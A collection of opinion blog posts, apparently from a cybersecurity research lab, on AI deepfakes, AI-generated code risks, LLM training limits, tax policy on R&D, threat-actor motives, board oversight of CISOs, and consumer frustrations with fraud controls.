The Next Generation of Identity Theft is Identity Hijacking

In 2024, AI will run for President, the Senate, the House, a Governor of several states.  Not as a named candidate, but by pretending to be real candidates.  What started as fake pictures of politicians has evolved to fake recordings of candidates' voices.  Fake videos are not far behind.  

In 2023 we saw fake pictures of former President Trump fighting police in front of a NYC courthouse.  Those were widely shared on social media (often without the original attribution that they were meant to be an example of what AI generated images can do).  Now we have AI recreating President Biden's voice as part of a robocall campaign to trick people into not voting in the primaries.

We've gone from worrying about politicians lying to us to scammers lying about what politicians said....and backing up their lies with AI generated fake "proof".  Make no mistake about it, this is a scam.  Not to try to steal money, but to steal votes.  This same technology has been used to recreate the voices of kids claiming to have been abducted so fraudsters could extort a ransom for kidnappings that never happened.  It's "identity hijacking", the next generation of identity theft, in which your digital likeness is recreated and taken where you didn’t want to go.

Fake videos of politicians giving speeches that never happened or falsely confessing to crimes are not far behind.  Don't think so?  Ask yourself why the screen actors guild went on strike.  One key demand is that AI not be used to recreate actors, because the fakes are realistic enough that the actors would never need to be hired again.  Social media will be the delivery system of many political scams, but as the latest robocalls showed there are other ways to reach out and trick voters.

There are several efforts underway to combat this, for those who want to check if a call or video is genuine.  Most have significant shortcomings.  One promising area that CTM is focused on is to continuously prove that the words you hear were actually said by the person they claim to be from.  These word fingerprints break disinformation scams and identity hijacking.

If we build the right defenses, AI may be able to run for office, but we can keep it from winning

portions of this blog were first used in an interview with TheStreet.com

Congress Declares War on American Innovation

Congress has two main powers granted by the US constitution: to tax and to declare war.  Little did the founders know that someday these powers would be combined, using taxation to declare war on American innovation.

Section 174 of the tax code did exactly that. 

Previously, companies that innovated through research and development (R&D) were able to deduct expenses incurred to offset revenue and pay tax on their actual profits.  But the law was changed as part of the “Tax Cut and Jobs Act of 2017”; effective tax year 2022 money actually spent on R&D cannot be “expensed”.  It has to be spread (amortized) across 5 to 15 years.  The effect of this is to lower costs and inflate paper profits to tax.  Even though the money has actually been spent on engineers and patents, companies have to pretend they kept most of it as profits and pay taxes on cash they don’t have.  Expenses like advertising can be immediately deducted, but not R&D.  Eventually, they catch up with year 1’s expenses and can work on year 2.  Until then, it’s an artificial tax bubble for the government.

Companies that invest a large amount in innovation relative to their revenue can actually owe more in taxes than their cash profits.  This is especially true for small companies who are inventing new technologies.

CTM is one such company.  We don’t sell products, we are a research lab that invents new ways to defend against cyber attacks.  Our largest costs are R&D.  As a result, in 2022 almost every dollar made was paid back out in taxes.  When people ask me what I do, I now say “I work for the government”.  CTM has always focused on our mission over profits, but the risk of paying more in taxes than we actually bring in makes this a charity.

You might think that this can’t be correct; that the government didn’t intend to discourage American innovation by making it unprofitable.  You might further think innovation in areas like protecting against AI generated identity theft, ransomware, fraud, and securing cloud data are examples of things they would want to encourage.  At the very least, maybe not discourage.  Apparently, you (and I) would be wrong.  The tax cut and jobs act is taxing American innovation out of existence.

Some in Congress, from both political parties, realized that this might have been a mistake.  In late 2022 and early 2023 they tried to amend the law to roll back this provision.  Their efforts failed because neither political party would work with the other.  Twice.  A 3rd attempt is now underway, but polarized partisan politics combined with an election year make success unlikely.

One “solution” proposed was to shut down CTM as a US company and reopen it in another country.  If the new company never hired US engineers or generated US income (only licensed innovations to non-American companies), it wouldn’t be subject to gimmicks in the US tax code.  US jobs would be shifted offshore.  We could rename the law the “Tax Increase and Jobs Elimination Act”.

The other solution is to simply stop investing in new innovation.  CTM has a portfolio of patents and other IP that we’ve created over the years.  We can shift our focus from invention to licensing.  Sales costs can still be expensed.

So that’s the plan.  Effective January 1st 2024 we are slashing our R&D budget.  We will focus instead on licensing IP we’ve already created.  If Congress ever decides to revisit their decision, we will do the same.  Until then, let’s talk if you are interested in completely new ways to secure software supply chains, identify manipulated images, stop ransomware from encrypting files, protect against AI creating interactive deepfakes, or anything else we’ve been working to solve.

Congress may have declared war on American innovation, but we can unilaterally freeze our innovation work to force a cease fire.

 

A version of this post first appeared as an op-ed in ROI-NJ

A 2024 Prediction: Sentient AI Won't Destroy the World, That’s a Job for Humans

Despite alarming headlines, why I’m more worried about evil humans with AI than about evil AI

It's been about a year since ChatGPT brought generative AI into mainstream awareness.  Despite impressive results from Large Language Models and diffusion based images, coupled with recent claims of advances toward achieving independently thinking "general AI", we are not on the precipice of AI taking over and destroying humanity.  

A fairly safe bet is that in 2024, smart computers won't decide to rid themselves of pesky humans by launching nukes.  I'm not saying computers can’t be wired up to try to guess launch codes, only that we aren't likely configure them to do that (we haven't thought that was a good idea to date) and AI lacks the ability to independently decide to do so today and in the foreseeable future. 

"But I've used AI and it does think, it can reason and respond", say some.  Not so, it offers the illusion intelligence.  How?  By looking for patterns of words (and bits of words) that appeared adjacent throughout the millions of documents used to train it.  If you ask for an apple pie recipe, it will have seen words like apple and pie and recipe near each other while being trained, and know that they tend to be near words like cinnamon, sugar, apples, bake, 300, degrees, and oven.  The genius of these systems is their ability to do association of billions of "factors" when fed massive amounts of training docs scraped from the Internet.  

It's inference at scale, not reason.  At best, it's what The Economist called "pseudo cognition".

That doesn't mean we are safe from harm caused by this new tool. Any tool can be used for good or evil.  Like a calculator, AI lets humans do things more quickly.  The ability to scale up efforts can be good when trying to cure disease or bad when trying to inflict harm.  AI is already being used to send fraudulent emails by scammers and ransomware attackers, to scan the internet for vulnerabilities to exploit, and to impersonate real people for fake extortion schemes.  We can't stop AI's use by bad actors.  It lets them do what they already do, just faster and at scale.

So what can we do?  Knowing that attackers have tools that scale up their capabilities, we can scale up our ability to detect and defend against them.  In some cases that means putting AI's ability to detect attack patterns to work for us.  In other cases, we can leverage new technologies to know whether the person on the phone or in a video is real and really saying the words we hear.  And we can seek to exploit what Beaumont Vance refers to as the “Achilles heel” of any pattern matching system by introducing nonsense that doesn't match any pattern it's been trained on and observing the result (Beaumont's version of a new Turing test).

My prediction for AI in 2024 is simple. As a tool it will continue to evolve and improve, like any new tech. What it wont do is evolve into an evil consciousness that wants to take over the world. We have plenty of pesky humans for that, who will use AI to amplify what they already do.

Is ChatGPT writing your code? Watch out for malware

If yours is like many companies, hackers have infiltrated a tool your software development teams are using to write code.  Not a comfortable place to be.

Developers have long used sites like stackoverflow.com as forums where they could get code examples and assistance.  That community is rapidly being replaced by generative AI tools such as ChatGPT.  Today, developers ask AI chatbots to help create sample code, translate from one programming language to another, and even write testcases.  These chatbots have become full fledged members of your development teams.  The productivity gains they offer are, quite simply, impressive.

Only one problem; how did your generative AI chatbot team-members learn to code?  Invariably by reading billions of lines of open-source software, which is full of design errors, bugs, and hacker-inserted malware.  Letting open-source train your AI tools is like letting a bank-robbing getaway driver teach high school driver's ed.  It has a built-in bias to teach something bad.

There are well over a billion open-source contributions annually to various repositories.  Github alone had over 400 million in 2022. That's a lot of opportunity to introduce bad code, and a huge "attack surface" to try to scan for issues.  Once open-source has been used to train an AI model, the damage is done.  Any code generated by the model will be influenced by what it learned.

Code written by your generative AI chatbot and used by your developers can and should be closely inspected.  Unfortunately, the times your developers are most likely to ask a chatbot for help are when they lack sufficient expertise to write the code themselves.  That means they also lack the expertise to understand if the code produced has an intentionally hidden backdoor or malware.

I asked LinkedIn how carefully people inspect the quality and security of the code produced by AI.   A couple of thousand impressions later, the answers ranged from "very, very carefully", to "this is why I don’t use generative AI to generate code", "too early to use" and "[too much risk of] embedded malware and known design weakness".  But the fact remains that many companies ARE using generative AI to help code, and more are jumping on the bandwagon.

So what should companies do?  First, they need to carefully inspect and scan code written by generative AI.  The types of scans used matter; don’t assume that generative AI malware will match well-known malware signatures.  Generated code changes each time it's written.  Instead, use “static” behavioral scans and Software Composition Analysis (SCA) to see if generated software has design flaws or will do malicious things.  It also isn’t a good idea to let the same generative AI that produces high risk code write the testcases to see if the code is risky.  That's like asking a fox to check the henhouse for foxes.

While the risks of generating bad code are real, so are the benefits of coding with generative AI.  If you are going to trust generated code, the old adage to "trust, but verify" applies.

 

A version of this post first appeared in Infoworld. Reprinted with permission. ©IDG Communications, Inc., 2023. Al rights reserved. https://www.infoworld.com/article/3709191/is-chatgpt-writing-your-code-watch-out-for-malware.html

Back to the Future: Generative AI may return us to the 1990s

If I told most people that I was building a new system that could change the world, they would likely want to hear more.  If I then said that it had a few issues like exponential growth in costs, supply chain limitations, and potential legal problems, the discussion would probably end.  Quickly.  That’s increasingly where we find ourselves with Generative AI.

Training AI is expensive

Many scientists have observed that we may be approaching the limits of using online data to train Large Language Models (LLMs) with massive numbers of “parameters”, used to establish relationships between bits of words (“tokens”).  As the number of parameters has exploded from hundreds to millions, the processing power required has grown exponentially.  Since these models need huge amounts of data to learn from, crawlers try to consume the entire Internet.  We have massively complex models ingesting massively larger amounts of data. 

The cost (time and electric power) to train models is becoming unsustainable.  Using rented processors, training a modern, general-purpose model from scratch on today’s data sets can cost tens of millions of dollars.

We are running out of good training data

In addition to cost issues, there may be limits on how much data we can feed AI.  As big as it is, the Internet isn’t infinite.  Once your massive models have scaped all available online data, what’s left to train with?  An often-cited paper projects we may start running out of training data as early as 2030 (arXiv:2211.04325 [cs.LG])

When you are out of new data to ingest, you either stop training or you begin to consume output that was synthesized by other AI.  Stopping freezes learning.  Training from synthesized data puts you in a sort of echo chamber; your models can quickly spiral into learning from the errors produced by others which create new errors that are again used to train others.  This is referred to as model collapse (arXiv:2305.17493 [cs.LG]).  It’s inbreeding with data, and probably won’t end well.

And “content creators” are increasingly taking steps to limit the use of their work to train models they will compete with (one of the demands behind Hollywood’s actors and writers strike is that AI not be used to displace them).  This will further limit the amount of training data available. 

Training data might be illegal to use

Content creators aren’t just looking to block their work from being scraped.  They are suing and claiming that AI trained on their work is producing “derivative” works.  The courts must decide where the line is between a derivative work and an original work that has been immaterially influenced by exposure.  If I paint an original picture, I'm probably influenced by every painting I've ever seen.  That isn't considered misuse of all prior painter's IP.  The closer I get to copying an individual work, the closer I come to creating a derivative work. Is it different when a machine does the same thing?  Probably not, but the lines haven’t been drawn.  Yet.

Once the courts and congress do draw lines, what happens to all the AI models that have been contaminated by training with stuff that (retroactively) isn’t allowed?  It’s a big enough concern that Microsoft announced they will assume copyright infringement risks related to customers use of their AI “copilot” service.  There is also an emerging area called "machine unlearning" where you try to get a model to forget something without starting over.  It’s like taking poison back out of a well.  Watch that space closely.

Taken together

Where are we?  Costs to consume massively larger data sets are becoming too high.  Running out of “good” data to train with is a real possibility, and training from synthesized data is frightening. And training with scraped data today has risks that your models won’t comply with future law.

Back to the Future

Solving these issues may require a trip to the past.  In the 1990s we did “data analytics” with much smaller amounts of data, and used it to generate predictions like customer buying trends.  The algorithms were complex and we had to make sure the data was highly accurate as “garbage in gave garbage out”.  We had small, curated data sets with complex algorithms to tease out value.

Then came the era of “big data”, enabled by social media and automation.  As available data grew quickly, we simplified our analytics to look for patterns and clusters and began to personalize predictions.  We no longer needed “clean” data, we just needed it “unbiased” and relevant to a specific task. 

LLMs began to scrape the Internet to learn everything, unconstrained by a specific task, so the inputs grew from “big data” to “huge data”.  There’s a lot of inaccurate data online, but also a lot of counter-data to remove bias thanks to the wisdom of the crowd. 

As training costs grow unsustainably, and we exhaust available and usable sources, future LLM training will be constrained to learn from smaller amounts of new data.  That will require more sophisticated approaches, such as augmenting LLMs with supervision and labeled data.  More complex techniques using smaller data sets will once again require more accurate data to minimize errors.

Data lineage and curation will again grow in importance.  I may start with a pre-trained LLM and carefully supplement the training with highly focused additional data through “transfer learning”.  I will likely want my new, focused data to have greater significance, increasing the importance of its accuracy.

In the end, we may find that our future is back in 1990s style data management.  Our algorithms will be swapped for models, but the importance of clean, curated data will grow.  Otherwise, our generative AI may generate costs, errors, and lawsuits…but not value.

 

When Generative AI Goes "Wrong"

A version of this first appeared in Private Company Director: https://www.privatecompanydirector.com/features/what-your-board-should-know-diving-ai

Most companies are rapidly working to develop an AI strategy, prompted in no small part by the success of “generative AI” tools like GPT.  For all of their business potential, it’s important to remember that their responses are sometimes very plausible and very wrong.  Over time, they may get better in some ways and intentionally worse in others.

Today’s wrong answers are largely unintentional, and happen for two reasons.  First, tools like Microsoft’s GPT based Bing and Google’s Bard have been trained on huge amounts of data scraped from the Internet.  From this, they synthesize likely responses to questions.  Their breadth of coverage is stunning, but as any parent will tell you it’s not a good idea to believe everything that’s posted online.  The Internet is full of unfiltered, biased information, misinformation, and sometimes disinformation.  Ask a question about medicine and you may get an answer sourced from a combination of peer-reviewed scientific journals and a blog from someone with an agenda to push.  If your training data is junk, so are your answers.  Microsoft’s first foray into AI chatbots was called Tay, and was “trained” by interacting online.  Unfortunately, an online community trained it to be racist and homophobic.  Microsoft pulled the plug.

The second reason is that generative AI generates.  The act of synthesizing an answer includes extrapolating.  Simply put, that means inventing likely but made-up data.  In one recent example, an attorney in New York used ChatGPT to research legal precedents for a court filing.  ChatGPT generated 6 bogus court cases and even created fake excerpts of judicial opinions.  When challenged, ChatGPT insisted that the fake information was real.  The court ordered both the attorney and his firm to explain why they shouldn’t be penalized for the citation of “…non-existent cases…[and] judicial opinions”.

This doesn’t mean avoiding AI.  Generative AI like ChatGPT is changing the way people search.  Instead of returning thousands of relevant links to read, it already “read” the material and synthesizes an answer.  As we grow to depend on synthesized answers, it’s worth remembering what we lose in this trade; we don’t get to see the data behind the answers.  Not having to slog through piles of results was the point, of course, but this lack of transparency means we don’t know the quality of the sources used and what references were invented.

Back when we got a pile of links, we could apply critical thinking to what we read.  If we knew the source had an agenda, we could take that into account.  Now, we get a result and we have to trust that the models were trained on unbiased data.  Trusting the quality is hard to do when most systems have been trained by crawling the Internet.  There is a massive amount of information to learn online, but some of it is massively wrong.

Why not train our own AI systems to ensure the data is unbiased?  There are two problems with that approach. 

First, the value of these systems is based on the vast amount of content they have been trained on.  Simply put, they know more, and can do more, because they consumed more.  Having to check and pre-screen everything isn’t practical if we want them to learn from everything possible.   Early tools, such as Wolfram Alpha, trained their systems on data that was carefully curated.  While accurate, their answers were limited in scope.  It’s why most people who’ve heard about ChatGPT haven’t heard about Wolfram Alpha.

The second issue is cost.  It’s been estimated that it costs millions of dollars to train a system like ChatGPT using rented, specialty processors from AWS.

If you have a narrow field of use, such as reading financial reports, you can curate specific data and train your own models.  For a general-purpose search engine replacement that seems to “know” about everything, it isn’t practical (just as it isn’t practical for everyone to build their own search engine).

As with Internet search, there will probably be only a handful of successful “GPT search engines”.  Small wonder that Microsoft and Google are rushing to be dominant players.  Nobody wants to be a future version of Altavista.

Since this new type of general purpose GPT search comes with the downside of not knowing if their sources were wrong, it implies another issue: what if the sources are intentionally wrong or biased?  With traditional search we have “sponsored” results; people pay to promote their answers by placing them near the top of the pile.  How do search companies, who make money selling ads and promoting specific content, charge for a single answer?  When I ask “what’s the safest and most reliable car under $40,000?” in a GPT search engine, I have to understand that answer might be biased or invented by accident.  Do I also have to worry that a car company might have “sponsored” the answer by paying to bias the training data and promote their product.

Hackers are already testing ways to intentionally bias AI training data and influence the answers these systems give.  Is it really a stretch to think that advertisers won’t want to intentionally bias the answers to make money?

What’s needed is either transparency into how answers were generated, eliminating the AI “black box”, or testing and certification that the data used to train AI models was unbiased.  Without that, we all need to double check the answers before buying that car.

 

Never buy a used hard drive

I recently purchased a new hard drive from Amazon to upgrade my desktop.  What I got was something that neither I nor the prior owner wanted.

Yes, prior owner.  When I went to install the drive, I noticed the “safety seal” open.  As a security person, that was concerning, but maybe I opened it earlier and was just having a senior moment.

I plugged it in with a newly purchased USB adapter so I could copy my old hard drive to the new one, then fired up the copying software.  It warned me that the data on my new drive would be erased.  What data on my new drive?  Surely that’s a generic warning.

It wasn’t.  The drive had a prior owner’s data.  A presumably bootable copy of windows, a few apps, and several browsers were all at my disposal.

My first reaction was annoyance that I was sold a used drive as new.  This was “shipped and sold by Amazon”, so it was a name brand drive that I was buying from a known company.  Amazon sells these new or used, and they probably grabbed one from the wrong bin.  Hard drives wear out, and I didn’t want one whose useful life was diminished.  It’s also a fairly modern drive, so there was a concern that the prior owner experienced problems with it before returning.  I definitely didn’t want someone else’s problem.

Then my cyber security experience kicked in. 

Reaction 1: “Great, now I have to scan my system for malware”.  It’s certainly not uncommon for used drives to have a virus.  Simply by plugging it in I could have been infected.

Reaction 2: “What if the adapter I bought was compromised?”  More likely those files were on the disk, since the seal wasn’t intact and they included browsers, but the brand new USB to hard drive adapter is from a company I never heard of.  Any USB device, even USB cables, can be hacked.  Your cable can become both a cable and an infected hard drive.  Would you notice?  Your mouse can become a keyboard that secretly types commands in the background.  Power bricks can (and sometimes do) connect to insecure wifi and grab copies of things like your account logins as they zip by in the air.  Hard drive controllers have been compromised to steal data or infect with malware, my concern here.  Even used routers have arrived with compromised code that sends copies of every online transaction to servers overseas.  Bottom line, don’t plug in anything unless it’s brand new and you know the seller is legitimate. I made a mental note to check the adapter separately.

Reaction 3: “How come the data wasn’t erased?”  Anyone recycling or returning a drive should securely erase their data using a program that overwrites all files.  I didn’t look deeply, but it sure seemed like I had access to the files and browsing history of the prior owner.  Worse, if they stored passwords in their browser I had those too.  Maybe they were lazy and assumed Amazon would erase the drive.  Maybe Amazon was lazy and assumed the prior owner did.  Maybe they both intended to and both screwed up.  The fact remains, if I had bad intentions the prior owner could have been in a world of hurt.  When I take an old spinning drive out of service, it gets a 3 step treatment: hit with a hammer, holes drilled through the media, and then placed in e-waste recycling.  Flash drives get securely erased, broken, and then similarly disposed of.

I’m sending the used drive back to Amazon and a replacement is already on its way.  I plan to inspect it very carefully.

Why your business needs to pay attention to deepfakes

this article was published in Chief Executive Magazine

Last year, Bruce Willis was in a commercial for Megafon, but never actually filmed the commercial. James Earl Jones' voice was used in a Disney spinoff of Star Wars, but the recording was made after the actor retired and stopped recording. A video of Elon Musk, promoting fake cryptocurrency site Bitvex he claims to have founded, was used to scam investors, but Mr. Musk never made the video (or any of the other scam crypto site promotions he appears in). Just two months ago, Binance's Chief Communications Officer led an entire developer conference in which he encouraged people to collaborate with a group of scammers-- only it wasn't really him.

All of these are examples of so called "deepfakes", in which realistic audio and video are produced without the participation of the person appearing in them. Artificial Intelligence (AI) continues to raise the bar in terms of their quality. While these are generally one-way presentations, the time is fast approaching in which they will be able to interact.

Why should a corporate CEO care? When is the last time you jumped on a call or video conference with your CFO or head of Accounts Payable? What if your team got a group voicemail, video message, or even a live video conference in which they were told by "you" to take an action that you never requested? Buy a product? Wire money? Make an announcement which would tank your share price to benefit short sellers? What if someone posted edited images of you on social media enjoying your competitors products?

Deepfakes come in lots of flavors. Editing and splicing real sound and images to change the meaning is commonly used by groups ranging from Internet trolls to government disinformation campaigns. Creating entirely "synthetic" voice and video that never happened is a newer threat, and as it becomes interactive it will change how we trust what we see and hear.

It all started with modifying existing images and audio. At the end of the day, digital pictures and sound are just data. And as your security team will tell you, data can be stolen, corrupted, or changed (they call this the CIA model, in which attacks can affect data confidentiality, integrity, or availability). Deepfake integrity attacks have gotten better as AI has gotten better. The more voice and video available online from presentations and investor conferences, the more data to train malicious AI. Add to that the introduction of "Generative Adversarial Networks", AI that teaches AI to get better, and we end up with terrifyingly realistic results.

What can be done? First, we need to teach people to "trust but verify". We already know that fake emails pretending to come from an executive who urgently demands an unusual payment is cause for concern. It's called Business Email Compromise (BEC) and results in in billions of dollars of fraud every year. We tell our teams that if a request seems odd, they need to make a call and confirm it. What if calls cant be trusted? The important thing is to check unusual requests using a completely different channel. If the request came in by zoom, send a text to confirm, not a chat message in the zoom session. If it came over the phone, send an email.

Second, we can reinforce that messaging with our own actions. When we ask someone in the company to do something a little out of pattern, we can say we will confirm it via email/text/voicemail...any channel but the one being used.

Finally, we can use tech to fight tech. Executive headshots on the website should be micro-fingerprinted to detect later misuse, and a brand protection company should be hired that uses micro-fingerprints. We can add subtle background sounds to audio conferences to make them harder to use to train AI. And we can keep inventing and investing in new ways to defend our firms and our brands from the latest methods used to attack them.

Five Questions Every Board Should Ask Their CISO

This article first appeared in Directors and Boards

Not all board members have cybersecurity expertise, but all can play a vital role in protecting their company’s sensitive information. It comes down to asking the right cybersecurity questions of the company’s chief information security officer (CISO), including questions on risk frameworks, threat actor profiles and appetite for customer friction.

The Role of CISOs

CISOs occupy a unique position within most companies since cybersecurity deals with motivated attackers who actively attempt to circumvent controls. Other forms of risk, such as a fire in a facility or a disruption in the supply chain, tend to be random. With motivated attackers, every vulnerability will eventually be found and exploited. The result is that some CISOs try to prevent all exploits, a mission that is both doomed to fail and potentially harmful to the business.

Boards (along with their CEOs) should communicate a different message to CISOs:

"First, we understand that it’s not feasible to eliminate all risks, and we don’t want to try. Instead, we want to manage risks intelligently and accept that there will be outlier events that we need to react to and recover from. The more likely the probability and more extreme the impact, the more the event needs to be mitigated. As long as risks are managed wisely, we won’t ‘shoot the messenger’ when told that an event has occurred.

“Part of managing risk wisely involves a cost-benefit analysis. Costs are not just economic – any friction added to the business or customer experience must be considered against the effectiveness of a control. The more a control negatively impacts users, the less valuable it is. This requires reducing the security benefit based on the friction created. And friction should be measured quantitatively so we can make a decision on the benefit of the control versus the impediment it creates for users."

Most cybersecurity leaders are measured on the strength of their controls, but few are incented to minimize impact to legitimate users. Every CISO should be.

With messaging established, boards can move on to governance. There are five questions every board should ask about their CISO’s strategy. Get these five right and your company will be ahead of the pack.

What frameworks do we use to manage risk, and how do we benchmark ourselves using these frameworks?

There is no shortage of security frameworks: ISO 27000 and COBIT focus on controls, CVE/CVSS scoring focuses on vulnerability measurement and ATT&CK zeroes in on threats. The value of these frameworks, when properly used, is that they provide a common language to describe risk and identify control gaps. Some frameworks also allow measurement of uncontrolled risk; these are especially useful to determine whether risks, over time, are increasing or decreasing, and to benchmark current state against others.

What types of threat actors are interested in attacking us, what are they motivated to do and how do we defend ourselves against their specific techniques?

It’s important to recognize that different types of attackers have different motives, which results in the use of different methods. Corporations and their boards must remember that the weapons they are defending against may not be the ones bad actors are planning to use. Put another way: There is little value in being able to block a punch if your attacker has a crossbow. Threat actors with financial motivations tend to broadly use ransomware, fraudulent invoicing and compromise accounts at financial institutions. Attackers trying to draw attention to a cause seek to disrupt businesses in a way that may be highly visible and potentially damaging to corporate reputation. Most nation-states preparing for cyber war try to silently embed themselves in critical infrastructure. Businesses should make basic assumptions on the type of attackers whose motives best align with them as a target and understand the methods they would likely use. Then, plan defenses against those specific techniques.

How much friction do we add to the customer and user experience?

This question is designed to encourage CISOs to think about the impact of their controls on legitimate users, including suppliers, vendors, partners and customers. It’s far easier to have great security if you are willing to create business impediments and customer friction, such as constantly challenging users to prove their identity or prohibiting the use of customer-friendly communication channels. At the same time, companies can fall behind competitors that don’t make life hard for customers. Inquiring about friction from the perspective of customers and other users forces security teams to ask themselves, “What friction are we creating?” They might not like the answer.

How do we discover sensitive data, and how do we protect it?

It’s hard to protect sensitive data if you don’t know where it is. Over time, controls intended to prevent data from being mishandled will have misses. It’s easy to copy and save data in the wrong place, new fields will be added to spreadsheets and databases that change their sensitivity, and people will forget to follow processes. The result is your most sensitive data will spread to less secure desktops, laptops and cloud storage. Combating this requires continuous scanning to discover sensitive data where it shouldn’t be, and then to take corrective action.

Do you have the resources you need to be successful?

This question may sound obvious, but it needs to be asked. Sometimes a CISO’s budget allocation isn’t sufficient to manage risks properly. This is particularly true when organizations suffer from “recency bias,” the belief that if they haven’t had a recent breach, there isn’t a need to invest in new controls. Motivated attackers are constantly evolving their techniques. That means there is no sitting still when it comes to cybersecurity. CISOs must continually improve the company’s defenses to keep up with attackers.

Where to Invest in Cyber Security?  First Understand Attacker’s Motives

Companies Need to Understand Cyber Criminals Goals in order to Properly Manage Risk

It seems like every week there is another cyber attack in the news, resulting in an insatiable appetite from technology teams to add new tools to protect their firms.  How should boards and non-technical executives decide where to spend time and money, since the essence of any great strategy is knowing what not to invest in?

Answering that question involves answering another one: who is doing these attacks, and why?

It turns out that there are different types of threat actors, with differing motivations, that use different methods.  Understanding the “actor-motive-method” framework is key to smart risk management and governance; it allows one to focus investment on controls that align with likely attacks without over-investing in controls that are unlikely to be needed.  Imagine an attacker that wants to do harm to the pharmaceutical industry, and who developed a unique cyber-weapon.  If you are in pharma, you need to defend against it.  If you aren’t, there may be better places to invest resources.  “Actor-motive-method” lets you quickly determine whether a newsworthy attack method is material for you.

It’s worth exploring five types of actors, their motives, and some commonly used methods aligned with their goals.

Actor 1: Nation States

Most nation states engaged in hacking are motivated by either espionage or are preparing for cyberwar.  Espionage targets may have proprietary methods and know-how (industrial espionage) or may have valuable data related to national security or public figures.  If you are a defense contractor, healthcare provider, or part of critical infrastructure, you are a target of interest.  If you are a retailer, maybe not.  It’s valuable to view your business through a potential attacker’s lens to understand if compromising you matters to them.

Heavily sanctioned countries, such as Iran and North Korea, are also believed to execute attacks that steal money as a way to mitigate the impact on their economies.  This is far from common, but it’s important to focus specifically on the methods they employ if your company holds significant assets.  Additionally, Russia is believed to have executed disinformation campaigns in which media organizations are a target.

Because they don’t wish to be detected, many of the methods used by nation states are stealthy.  Exploiting “zero day” and unpublished vulnerabilities is common, as are targeted “spear phishing” campaigns and attacks through trusted 3rd parties (vendors with privileged access, software supply chains, etc).

Actor 2: Activists

In contrast with nation-states, activists generally want to draw attention to themselves and a cause.  Their goal is often to disrupt widely used systems and services to maximize impact.  They seek not just visibility, but want their damage or disruption to be attributed to them.  Anonymous is a commonly cited example, often focused on socio-political causes.

Specific actors may focus on a particular target or industry, particularly when they feel their cause has been wronged in some way.  Media organizations are often targets after unflattering publications.  Critical infrastructure is a common target because of the potential for widespread disruption.  It’s common for these actors to use methods like Denial of Service attacks, “wiper” software to delete data, and compromised login credentials.

Actor 3: Organized Crime

Most organized, criminal gangs are financially motivated; they want to steal money or monetary equivalents like cryptocurrency, extort payment, or steal data that can be readily sold.  These attackers are unconcerned about attribution to their organization so long as payment is received, as they often operate with impunity from places with a weak rule of law.  In some cases, they are protected by a government in exchange for only attacking geo-political rivals.

These actors tend to use less sophisticated methods than nation states, such as demanding payment to stop ransomware or Denial of Service attacks, and are less specific in their targeting.  Anyone with a high profile and perceived ability to pay is an extortion target.  Theft of data and account compromises often leverage social engineering, exploiting vulnerabilities, and phishing.

Actor 4: Employees & Partners

Most attacks from employees, contractors and partners are crimes of opportunity.  Theft is a significant motive from what’s called the “insider threat”, but vandalism and data destruction motivates those who have been recently dismissed or reprimanded.  The trusted access given to insiders can let them do significant harm, requiring controls like “least privilege” (limiting access to only what people need to do their job) and “maker-checker” (having an independent reviewer look at high risk things).

Most attacks by insiders are either meant to go undetected, or to be hard to attribute.  Administrative account compromise, intentional misuse of legitimate access, and destructive “time bombs” are common methods used.

Actor 5: Independent Individuals

Individual attackers have a variety of motivations.  Some seek financial gain, others simply want attention or prestige.  While a few have sophisticated skills, the vast majority are referred to as “script kiddies”, less-capable people running brute force attacks or using tools they acquired from others.

Many organizations have some level of exposure to these attackers, and their methods very widely, but their lack of sophistication allows much of the threat to be mitigated by simple controls like firewalls, antivirus, patching, and good authentication (strong passwords or multi-factor authentication).

 

Most attacks are meant to (or quietly prepare to) damage infrastructure, steal money or IP, access customer information or other sensitive data, disrupt service, damage a reputation, or disseminate misinformation.  Variations and combinations of these exist, of course, and different actors have different methods and capabilities.  Once you know who is most likely to have an interest in attacking your business, and why, you can determine the current and evolving methods they might employ. 

Understanding actor-motive-method allows you to invest more in the right levels of controls against the right forms of attacks, in the right places.

Fraud vs customer (dis)satisfaction

As a former cybersecurity and fraud practitioner, I’m well aware of the trade offs between a frictionless client experience and protecting those clients from fraud.  That’s why it’s unnerving when confronted with unnecessary friction improperly blamed on “fraud prevention”. 

I recently found this with Verizon Wireless.  Significant force (me), meet unmovable object (them).  I’m sure they think they “won”.  They really just lost a customer.

I’ve had various Verizon wireless accounts for many years, including one for my mom’s cell service.  Verizon pushed “auto-pay”, in which they would either have unlimited access to withdraw money directly from my bank accounts (people really let them do that?)  or simply charge my credit card in advance for mom’s monthly bill.  All was fine until I noticed an old Verizon charge labeled “equipment”.  That seemed odd as we bought her unlocked phone elsewhere and brought it in.  I called Verizon customer service for help.

Enter the dreaded “try to talk to a human” problem.  The automated “IVR” that answered wasn’t going to let just anyone sit on hold; they needed me to prove my worth to get in the queue.  But their tech didn’t work.  It said the phone number I entered was not a Verizon wireless number and hung up.  Several attempts proved that simply re-entering a correct phone number wasn’t going to convince them otherwise.

I decided the best way to get their attention was to contest the charge until they explained what “equipment” we bought.  Two things happened in rapid succession: the credit card company misunderstood and contested 4 Verizon charges.  15 minutes later, with no help from the unreachable Verizon support, I deduced the “equipment” was actually a mislabeled service fee.  Less than 20 minutes after contesting the charge(s) I called the credit card company and canceled all disputes. 

At no time was Verizon paid late.  These were charges in the past and a prepaid account.

That didn’t matter.  Verizon has an algorithm that says multiple disputes must be “fraud” and, apparently, the fact that the disputes were all canceled immediately must somehow be more evidence of fraud.

Verizon responded by sending  a text and email saying that my payment method on file wasn’t valid.  I assumed that Verizon wanted a different card.  Not so simple.  They hadn’t just decided that the uncontested charges for which they had already been paid were “fraud”.  No, they were “FRAUD!”  The result of which was the account was put in “cash only” mode.  I finally got an agent, who assured me he would have it reviewed.  A day later, another set of messages, repeating that we still had an invalid payment method.  Another long wait to chat with someone else and I was told there is no way out.  Once in “cash only” always in “cash only”.

“Can I give you a different credit card?” Nope.  “OK, can we turn off auto-pay and you just bill me since I already pay each month in advance of the service “  Nope, cash only.  “Can I prepay for a year’s worth of service, in advance, and have a big credit?”  Nope.

“What CAN I do?”, I asked in frustration.  “You have always gotten paid in advance of the billing period.  There are no outstanding disputes.  I just want to minimize the inconvenience for my mom.”  Verizon said mom or I would have to go to a Verizon wireless store once a month, forever, and bring cash to pay for that month only.  Really? 

As if that wasn’t enough, they then offered another “solution”.  I could buy Verizon gift cards at WalMart and load them into my account each month.

